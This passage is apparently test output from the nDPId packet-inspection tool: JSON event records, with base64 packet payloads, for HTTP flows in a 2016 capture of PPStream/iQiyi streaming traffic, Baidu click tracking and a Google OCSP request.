-02163{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1034,"source":"pps.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1467353151975,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353151975,"pkt":"TF4M6gNlABxCjnAxCABFAAUUC05AAIAGQJvAqHMITeooYMU2AFCms6hhkbp6GVAQAQSchQAAfQmTpyjixsOwP21FM2w\/ULoWwCiRrGBztIvpkusTbkEbT7JRm749XrUdCj1kKEvBT\/wTVkKLufbjw1lE2fa\/UtfZqs8TT1sk5wEGF4kYfIBf8IaB+OB99fNQgj9Vf1WdVn6TWCfKWR8\/tOS1RKXEgVzfK9erxE3KK+nwydrin0EcycTdDVWiVtuMe6+NSVWZ\/hX990m9djhmhk3Y\/4CbzK44FcPuMMFEvf5FVV6Oh2IVmfsf\/HyiZyDsblCwMFxZeIENUdwKFZahHZX4t2m+0Z8nqx5GXJvlYlyBEV3d0wnwacDVs7VGlTeQSPCThjPgIK8C3+Vm\/SkQMbSbjQQCR56leCZ3zx0zWA16oy\/HwboJXydgKpLLIsIb296bgz9PD0n73r5JevLp9zMQqDnUQH7bGAIZpCoRWg6yOqztL9wx8O8w7fULoBoHntXDNfSIf8aFHnKtztY0xF\/96mqnymFN1wqAbHV11hLYYhYABZBRKOYh4GvMJKN2EaePTJX1g69akJ5Coj\/WAxsj0dEvDR\/vazeiKPax6X0XCpj5u6F0enF2pgEO1DTDpJi4uqvsm4AG7RZTr9WzwZ511fH70pdVZhvHAHeLJEQhK3oT2d6qVMypkVqz3M6P1FXtaWt6+1gJ1EA+POfXctGwSFaJ2WZGwODsWtngLfTDrHYAa++DuvVvAXrC2fFJrQkArXUNzp3jB4yvJRX9IfGTljC134RtjqrqbfWIsHFlGJEvMl6y8wFPjh0U9nAnPPQHSvBi4P8rwzQhP8lZJWbdcGMeiQgoqjzlwL1JkK4Z+B\/r9S3cXUR8rrHDij9ETvqsfuOaaaj2os8zFQDB8g7oYE5htEg8jLGOrgDB+UxAsTk63FA\/Jq1qLQHIt5T87bux2F3Z6\/NtrKJ6XYTsiyX+gxtG9H+42iLcG1kZ\/aUAi1jpTBvtNKfvz8CwqOqNqLU20IAIOBemooRjwRmnBDY3f6aUMeS+wFWlvE\/51CwA1+ifJ60PDvUC79ewXAaFTKMKjf0aaHbyL5CorfEgQAN7IeqBZ06UIaZ6vzz7AgQaAmx6+Ba5qOjoaqoz\/AZLRtOM5g9J99\/JqcSZWau6dqbzwSi9lHTkFpydYtcaUiasMFbnGv1qCDetlZciKtaHoyXbLcLDtNVUeS+HOrUzQyYK2h4whXgFAMDp8Qgu77GMRNBVQqzQrQHNXcQsTRb6ToCJRD0mhPHF56bxN+TcgS8+LJg2hXeTQJGeN4XVvZl+\/NwXCMoOTGaegW++r9Spf9MH6Q7pxuozLc8xjGZ4BotpQroHGQdbg1euShz6cj4v+w35bhHqsX2WqI17RldQkIoRivoqIWQBzpBtvyVToKzr4w1pfcU7KlWiZF6wXXPmeAndVoYy0RAdjUny0dy7q\/aodxD7\/IpKex\/VPNqhV606AtQnAV2BIj+BMksKx18fv+MTvBJVqBMbMlNv\/dfX4KuK9dxD\/j5nlJb1fFCWJ+mUJw+9FKSt1DG2gs0a3nU5wTbq1xdLsklg3Akuz9T9GOR2bt29bGI8qPpXY4FyhIeC9WH4\/TgMEDv9wfb4n6lndgz9I\/9vnUXWZxcDVa2twnV4LY8xc0KQum7e2YlcthsPm+N4Sl\/nQbs4298fPcsHdqZxtg1t+yz4aZA3Jpe+9\/ltbgGRFyN2OyRh7w7lbrWs"} -02155{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1035,"source":"pps.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":3,"flow_last_seen":1467353152282,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353152282,"pkt":"TF4M6gNlABxCjnAxCABFAAUUC5NAAIAGQFbAqHMITeooYMU2AFCms61Nkbp6GVAQAQTfHQAAbLkOCKU4wj\/evx8imwONGRNDCRNcxEbrXP8hhP5gS61xcdF\/9QCewJiAs88\/dsvrtuhb3rfKKfW889MM5i42wXGEV9fB6Oxnr9wNq+2BhBuurBIHxqXRfAAEoidfx5NjtSMkojiYfAgpgjXDepNqnYPmOEFYHjyOyZguAfDLSM7WCkcWflClhfDaN8J2wfLC\/MPix0DO7IQYMANuOzdnO3SsyyWTTBGHWAEilJLD4tHtNv5RXPXVzcDFv\/ZarQ8dpVXt06BE7M0zlIZna\/IAgdCvI6q5WBZEc\/DK1bc+szeRLHeTn9hb3LwIm5n4j6dH8WghVh4s\/faOqc4OH+pUVO\/YE9fpSsBUVYngldbrHRI5VyRGxL9aOSsPtS4AFeevGJhVzhN4cUWAnUrThdi80PfSu8tNoh7a5szE8bOfyFSl1J5U7dmSuzwsTd1O2VTTA6KkfW80J9853vrsBHj4FYhAgrfCc+AwKx842BJ5tAqCj0sllv5X87h05vAIn5jnPfuPTQZHDGSZF2ChAwxTMJDdvR6z9YqImCWEyGrlX5kVoRgmxMOXn9xgYST7BNbiKdlZJF63+s1OXqQANdKPZK9Tj+vw5aEt8npdIxi659XlE7GbPxGSGQAHioYprIcBMeXfKSeoFXi6v3GiDBYEY44c+YWn+u5dOrxPQy5gu98V\/bpgMgXufFfUvDeO83MuZBryxxpxRtKyO19btTWCUF4PY4vFOsUlEu5wupC5QJDHjSI5JBPnNgSjAFFlHl+H48KJmALxOWkXAjw7wfJ7i0t\/VAJjqzl7KEymLhTMovEkDd8M5KH4L7bM1Pk5SNL44CnPTt0uJC5bu5Y0nC5WeJ5o8FAU+zDySeyFlAKIjVubfBhsfH6iYELuT6bM366CZ2JChIMXy77eZ2ogebEDmfXuAZrshdW456rcGFtnXh7J5hHvVDP3AMs6IVf8LUWSqi6N9+RmH\/KbTYzdQuJb03F7\/k5dx4g2yWo3fs+Lr5JRUf5t\/vLHgHitgjVHiyfZxFryJ2gxO3j2J3Cy8+3iOyUtI4v3PFchrsaNap7PQFpuFhS4kHaW1nfHocLobHPOFLIJLaEq2Z3VJqsMiOWSIoeotU+nrZScO9ejGxvSfkni9AXlOWPv1zuo9rLJelhCyIJrC4Xn+WkzpkY6zFTV6\/5UunGX0Tb8Vczy7McXvGLjkrbiGj3QMStuCAUNlJpEVT8k65UrM5LwbEH4KAV5kUEs1eVMQu3tNilgdCCEWCCXyXIXhc7F8aNPdAP\/PS1DvzRFz2xUmcIICmQZ5HsVmrPOAorHnvum6saL0SZ4Xpsb2NtRcCkYo5ulH5R5LBdjwVak1WRQmaIpJTSuFDlTHmcUlO91XLgWqht8m4JPcT8KVxMhaep7\/D8rK0OPB4\/bZz3AmwRRkEn1w2WxcrplYcrA9llu+UUdElcjgIQb+8Ut3dZ78QhR6hg0LSfopHZZKMjm7H8PGYnnckV7+UPzMYjSuw2xH6Scc5NP4qyN1pRNyJqbAsYjU9DQoRSV4QpLKW1o4cygA24ZnSsb0t8q6Ugh54j1Rk4AcTFxkKhm0GqVFfy3vqOZrj5LFm1yDiouv3X+Ev+I8njUSG1\/7yVhpxE8Ojwp45UwRLFQxvD31ZdmkgP4Weywok7EK11JBAomj+s4\/jGCJXIASa\/M"} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":994,"source":"pps.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353138757,"flow_last_seen":1467353138757,"flow_idle_time":7560000,"flow_min_l4_payload_len":1260,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":1260,"midstream":1,"thread_ts_msec":1467353138757,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50463,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +02136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":994,"source":"pps.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1467353138757,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353138757,"pkt":"TF4M6gNlABxCjnAxCABFAAUUA1lAAIAGkOvAqHMIZePIC8UfAFBKp6EFWDmKmFAQ\/\/B9QgAAR0VUIC90cmFjazI\/YT0xJmFzPTE7MiwzOzQsNSZiPTE0NjczNTMxMzgmYz1hZTg3Y2IzY2ZkZjQ5NGFhNDhkYzYwODkwOWY2OTI1MCZjdj01LjIuMTUuMjI0MCZkPTUwMDAwMDA4NTg4NzQmZHI9MjE3NSZmPTRlM2FlNDE1YTU4NDc0OGFjOWFhMzE2MjhmMzlkMWU4Jmc9MF9hYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbiZoPSZpPXFjXzEwMDAwMV8xMDAxNDAmaXY9MCZqPTMxJms9MTgwOTMyMzAxJmtwPTRlM2FlNDE1YTU4NDc0OGFjOWFhMzE2MjhmMzlkMWU4Jm49NDc5NTMxMDAwJm89MSZwPTEwMDAwMDAwMDAzODEmcT01MDAwMDAwOTI3NTU4JnI9YzQ4ODllNjRhZDlkOWVlYjlmZjQzODkxMDg1MGM0NDImcnQ9MTQ2NzM1MzExMyZzPWFlYTU2YTgwOGZjOTJlZjM2MDUxOTEyMTk0OGUwZjI3JnN2PTQuMTAuMDA0JnU9MSZ1cD0mdj01MDAwMDAwODU5MTI0JnZlPTEmdz0yLDMgSFRUUC8xLjENCkFjY2VwdC1MYW5ndWFnZTogemgtQ04NClJlZmVyZXI6IGh0dHA6Ly93d3cuaXFpeWkuY29tL2NvbW1vbi9mbGFzaHBsYXllci8yMDE0MDkyNC9NYWluUGxheWVyXzVfMl8zX2MzXzJfMV82LnN3Zg0KcXlpZDogYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOiBfMjAxMg0KcXlwbGF0Zm9ybTogMC0yDQp4LWZsYXNoLXZlcnNpb246IDEyLDAsMCw3MA0KQWNjZXB0OiAqLyoNClByYWdtYTogbm8tY2FjaGUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzQuMCAoY29tcGF0aWJsZTsgTVNJRSA4LjA7IFdpbmRvd3MgTlQgNi4xOyBXT1c2NDsgVHJpZGVudC80LjA7IFNMQ0MyOyAuTkVUIENMUiAyLjAuNTA3Mjc7IC5ORVQgQ0xSIDMuNS4zMDcyOTsgLk5FVCBDTFIgMy4wLjMwNzI5OyBNZWRpYSBDZW50ZXIgUEMgNi4wKS9RWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBhcGkuY3VwaWQuaXFpeWkuY29tDQpDb29raWU6IHBwc19jbGllbnRfdmVyMj01LjIuMTUuMjI0MDsgVDAwNDA0PTRlM2FlNDE1YTU4NDc0OGFjOWFhMzE2MjhmMzlkMWU4OyBfcHBzX2l2aT1WazQ5TVRZd05UQTFMYVcvcFBtaFJ6OC9QNlRhcEVlbXVEOC9wTSt3Wmo4dHBMV3gzemd3cGxvL3BHYW9jU1pXVUQweEpsWkRQVDgvUHo4K3BMV3gzemd3cGxvL3BHYW9jU1pXU2owdE1TWldVejFRSmxaRVBTWldWRnRCWFQweU1UYzFKbFpOUFNaV1ZqMDFMakl1TVRVdU1qSTBNQ1pXVlQxb2RIUndPaTh2ZDNkM0xtbHhhWGxwTG1OdmJTOTJYekU1Y25K"} +01395{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":994,"source":"pps.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353138757,"flow_last_seen":1467353138757,"flow_idle_time":7560000,"flow_min_l4_payload_len":1260,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":1260,"midstream":1,"thread_ts_msec":1467353138757,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50463,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"api.cupid.iqiyi.com","url":"api.cupid.iqiyi.com\/track2?a=1&as=1;2,3;4,5&b=1467353138&c=ae87cb3cfdf494aa48dc608909f69250&cv=5.2.15.2240&d=5000000858874&dr=2175&f=4e3ae415a584748ac9aa31628f39d1e8&g=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&h=&i=qc_100001_100140&iv=0&j=31&k=180932301&kp=4e3ae415a584748ac9aa31628f39d1e8&n=479531000&o=1&p=1000000000381&q=5000000927558&r=c4889e64ad9d9eeb9ff438910850c442&rt=1467353113&s=aea56a808fc92ef360519121948e0f27&sv=4.10.004&u=1&up=&v=5000000859124&ve=1&w=2,3","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} +00704{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":995,"source":"pps.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1467353138757,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":241,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":241,"pkt_l4_len":207,"thread_ts_msec":1467353138757,"pkt":"TF4M6gNlABxCjnAxCABFAADjA1pAAIAGlRvAqHMIZePIC8UfAFBKp6XxWDmKmFAY\/\/B4OwAAc2RuVjRiR2N1YUhSdGJBPT07IFFDMDA2PXU1NDl2cHoxMGw5ZmthdHVtNGFsdzRicDsgUUMwMDg9MTQ2NjY0NTgxNi4xNDY2NjQ1ODE2LjE0NjY2NDU4MTYuMTsgSG1fbHZ0XzUzYjczNzRhNjNjMzc0ODNlNWRkOTdkNzhkOWJiMzZlPTE0NjY2NDU4MTc7IFFDMDA1PWFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQoNCg=="} +00786{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":996,"source":"pps.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1467353138794,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":306,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":306,"pkt_l4_len":272,"thread_ts_msec":1467353138794,"pkt":"ABxCjnAxTF4M6gNlCABFAAEkTcBAAC8Gm3Rl48gLwKhzCABQxR9YOYqYSqemrFAYSdTGUAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjM4IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWw7IGNoYXJzZXQ9dXRmLTgNCkNvbnRlbnQtTGVuZ3RoOiAyDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQWNjZXNzLUNvbnRyb2wtQWxsb3ctQ3JlZGVudGlhbHM6IHRydWUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQoNCm9r"} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":997,"source":"pps.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353138931,"flow_last_seen":1467353138931,"flow_idle_time":7560000,"flow_min_l4_payload_len":653,"flow_max_l4_payload_len":653,"flow_tot_l4_payload_len":653,"flow_avg_l4_payload_len":653,"midstream":1,"thread_ts_msec":1467353138931,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.112.49","src_port":50464,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01323{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":997,"source":"pps.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1467353138931,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":707,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":707,"pkt_l4_len":673,"thread_ts_msec":1467353138931,"pkt":"TF4M6gNlABxCjnAxCABFAAK1A3VAAIAG1W7AqHMIe31wMcUgAFAUdsqc+xrYh1AYQTe7PAAAR0VUIC9jbGs\/NTNlMjVlMzNlMDY0YzY1N2MwNmI1NThlNWMzYzMzZmQgSFRUUC8xLjENCkFjY2VwdC1MYW5ndWFnZTogemgtQ04NClJlZmVyZXI6IGh0dHA6Ly93d3cuaXFpeWkuY29tL2NvbW1vbi9mbGFzaHBsYXllci8yMDE0MDkyNC9NYWluUGxheWVyXzVfMl8zX2MzXzJfMV82LnN3Zg0KcXlpZDogYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOiBfMjAxMg0KcXlwbGF0Zm9ybTogMC0yDQp4LWZsYXNoLXZlcnNpb246IDEyLDAsMCw3MA0KQWNjZXB0OiAqLyoNClByYWdtYTogbm8tY2FjaGUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzQuMCAoY29tcGF0aWJsZTsgTVNJRSA4LjA7IFdpbmRvd3MgTlQgNi4xOyBXT1c2NDsgVHJpZGVudC80LjA7IFNMQ0MyOyAuTkVUIENMUiAyLjAuNTA3Mjc7IC5ORVQgQ0xSIDMuNS4zMDcyOTsgLk5FVCBDTFIgMy4wLjMwNzI5OyBNZWRpYSBDZW50ZXIgUEMgNi4wKS9RWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBjbGljay5obS5iYWlkdS5jb20NCkNvb2tpZTogSE1BQ0NPVU5UPTg4Q0M2OUIwNEM5RDYyOUE7IEJBSURVSUQ9MjEwMkRDNzUxRUQwREYzNkUzRDZDRjZDMjEwRkFCNzk6Rkc9MQ0KDQo="} +00976{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":997,"source":"pps.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353138931,"flow_last_seen":1467353138931,"flow_idle_time":7560000,"flow_min_l4_payload_len":653,"flow_max_l4_payload_len":653,"flow_tot_l4_payload_len":653,"flow_avg_l4_payload_len":653,"midstream":1,"thread_ts_msec":1467353138931,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.112.49","src_port":50464,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"click.hm.baidu.com","url":"click.hm.baidu.com\/clk?53e25e33e064c657c06b558e5c3c33fd","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} +01370{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":998,"source":"pps.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1467353139050,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":744,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":744,"pkt_l4_len":710,"thread_ts_msec":1467353139050,"pkt":"ABxCjnAxTF4M6gNlCABFAALaH2hAAC0GDFd7fXAxwKhzCABQxSD7GtiHFHbNKVAYADhuxwAASFRUUC8xLjEgMzAyIEZvdW5kDQpMb2NhdGlvbjogaHR0cHM6Ly95b3V0dS5iZS85b3ZjSndDN0FFYw0KU2V0LUNvb2tpZTogSF9NS1RfQ0xLSUQ9MDAwMDAwMDE1OWRhMTZiODU3NzYwODMyNWEwOGEzNzYwMDAwMDAyMDM1MzM2NTMyMzU2NTMzMzM2NTMwMzYzNDYzMzYzNTM3NjMzMDM2NjIzNTM1Mzg2NTM1NjMzMzYzMzMzMzY2NjQwMDAwMDAwODc5NmY3NTc0NzUyZTYyNjU7IFBhdGg9LzsgRG9tYWluPWhtLmJhaWR1LmNvbTsgRXhwaXJlcz1GcmksIDAxIEp1bCAyMDE2IDA2OjM1OjM4IEdNVA0KU2V0LUNvb2tpZTogSF9NS1RfQ0xLTE9HPTAwMDAwMDAxNTlkYTE2Yjg1Nzc2MDgzMjVhMDhhMzc2MDAwMDAwMjAzNTMzNjUzMjM1NjUzMzMzNjUzMDM2MzQ2MzM2MzUzNzYzMzAzNjYyMzUzNTM4NjUzNTYzMzM2MzMzMzM2NjY0MDAwMDAwMDg3OTZmNzU3NDc1MmU2MjY1OyBQYXRoPS87IERvbWFpbj1obS5iYWlkdS5jb207IEV4cGlyZXM9RnJpLCAwMSBKdWwgMjAxNiAwNjozNTozOCBHTVQNClAzUDogQ1A9IkNVUmEgQURNYSBERVZhIFBTQW8gUFNEbyBPVVIgQlVTIFVOSSBQVVIgSU5UIERFTSBTVEEgUFJFIENPTSBOQVYgT1RDIE5PSSBEU1AgQ09SIg0KQ29ubmVjdGlvbjogY2xvc2UNCkNvbnRlbnQtTGVuZ3RoOiAwDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjM4IEdNVA0KU2VydmVyOiBhcGFjaGUNCg0K"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":999,"source":"pps.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139305,"flow_last_seen":1467353139305,"flow_idle_time":7560000,"flow_min_l4_payload_len":226,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":226,"midstream":1,"thread_ts_msec":1467353139305,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.66.182.24","src_port":50466,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00754{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":999,"source":"pps.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1467353139305,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"thread_ts_msec":1467353139305,"pkt":"TF4M6gNlABxCjnAxCABFAAEKA4dAAIAGQVvAqHMIy0K2GMUiAFDWCs3i1IWCxVAYAQQdEwAAR0VUIC9vY3NwL01Fa3dSekJGTUVNd1FUQUpCZ1VyRGdNQ0dnVUFCQlR5NEdyNWhZb2RqWENiU1JramVxbTFHaWglMkJaQVFVU3QwR0ZodTg5bWkxZHZXQnRydGlHcnBhZ1M4Q0NFWXJGWGtxMnVneiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IE1pY3Jvc29mdC1DcnlwdG9BUEkvNi4xDQpIb3N0OiBjbGllbnRzMS5nb29nbGUuY29tDQoNCg=="} +00892{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":999,"source":"pps.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139305,"flow_last_seen":1467353139305,"flow_idle_time":7560000,"flow_min_l4_payload_len":226,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":226,"midstream":1,"thread_ts_msec":1467353139305,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.66.182.24","src_port":50466,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {"hostname":"clients1.google.com","url":"clients1.google.com\/ocsp\/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih%2BZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCEYrFXkq2ugz","code":0,"content_type":"","user_agent":"Microsoft-CryptoAPI\/6.1"}} +01465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1000,"source":"pps.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1467353139309,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":813,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":813,"pkt_l4_len":779,"thread_ts_msec":1467353139309,"pkt":"ABxCjnAxTF4M6gNlCABFAAMfaWMAAD0GXGrLQrYYwKhzCABQxSLUhYLF1grOxFAYAO2vKAAASFRUUC8xLjEgMjAwIE9LDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jc3AtcmVzcG9uc2UNCkRhdGU6IFR1ZSwgMjggSnVuIDIwMTYgMTc6MzQ6NDkgR01UDQpFeHBpcmVzOiBTYXQsIDAyIEp1bCAyMDE2IDE3OjM0OjQ5IEdNVA0KU2VydmVyOiBvY3NwX3Jlc3BvbmRlcg0KQ29udGVudC1MZW5ndGg6IDQ2Mw0KWC1YU1MtUHJvdGVjdGlvbjogMTsgbW9kZT1ibG9jaw0KWC1GcmFtZS1PcHRpb25zOiBTQU1FT1JJR0lODQpBZ2U6IDIxNzg0OQ0KQ2FjaGUtQ29udHJvbDogcHVibGljLCBtYXgtYWdlPTM0NTYwMA0KDQowggHLCgEAoIIBxDCCAcAGCSsGAQUFBzABAQSCAbEwggGtMIGWohYEFErdBhYbvPZotXb1gba7Yhq6WoEvGA8yMDE2MDYyODA3MDAxN1owazBpMEEwCQYFKw4DAhoFAAQU8uBq+YWKHY1wm0kZI3qptRoofmQEFErdBhYbvPZotXb1gba7Yhq6WoEvAghGKxV5KtroM4AAGA8yMDE2MDYyODA3MDAxN1qgERgPMjAxNjA3MDUwNzAwMTdaMA0GCSqGSIb3DQEBCwUAA4IBAQBKs877cfA5B2KGhwFSvIyUBYVxkUFjApJpIKog7zezUT4uRPAvbjktL\/Ds15nk8Y2Znhsf4SdVmf8GlloCQ6IXimfBklwRGn8\/72t77ZQLcabmXBFNBqyfqmRrW1O7lFh1alLxLnbN6PNKIPNv7dkTJVq4NRpJC1H3sykeA3XbH5EEaxhdvWFd1bsvybTiEgn7Bn5bpdXlExvoxRYuc7MLXQAUHRWSGKZpv+UniRokZRHgZy2GbGkQE8sf0PVCXrNjm4qsIXnQvqrF2J2xxFQ5x1wzU7J9l9Av+bPvuQI2mdLqvQskYq3tOxhJ6prFG9fcqt4lJS5E11mkG9tPXiAq"} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1001,"source":"pps.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139505,"flow_last_seen":1467353139505,"flow_idle_time":7560000,"flow_min_l4_payload_len":575,"flow_max_l4_payload_len":575,"flow_tot_l4_payload_len":575,"flow_avg_l4_payload_len":575,"midstream":1,"thread_ts_msec":1467353139505,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50467,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01219{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1001,"source":"pps.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1467353139505,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":629,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":629,"pkt_l4_len":595,"thread_ts_msec":1467353139505,"pkt":"TF4M6gNlABxCjnAxCABFAAJnA5RAAIAG6ATAqHMIymwO28UjAFBUZatTb7o85VAYAQQGIwAAR0VUIC9jb3JlP3Q9MTEmY3Q9YWRzdGFydCZzdGFydHRtPTEwOTcmcmVzZXQ9MSZyYT0yJnBmPTIwMSZwPTExJnAxPTExNCZwMj0zMDAwJnNka3RwPTEmYzE9NiZyPTUwMDQ5NDYwMCZhaWQ9NTAyOTU5OTAwJnU9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mcHU9Jm9zPXdpbmRvd3Mmdj01JTJFMiUyRTE1JTJFMjI0MCZrcnY9MiUyRTAlMkUxMDImZHQ9Jmh1PS0xJnJuPTE0NjczNTMxMTkmaXNsb2NhbD0wJmFzPWQxOWY2NDA0N2I2NDFjZDZmZjA5NmIwNGZiMmEzMGI1JnZlPTNjYzBjOGZhMzcyNjI1ZTY0MTQzMTQ0ODE2ZjNlOTY4JnBlPWM5NWQ5OTJlMjk4NTZkYzg0ZjJlOTkwN2EyZTRiMjgyJnZmcm09JmNobD0maGNkbnY9MTAuMC4wLjI5MyZ0cGNkPTAmaXNkcm09MSZodD0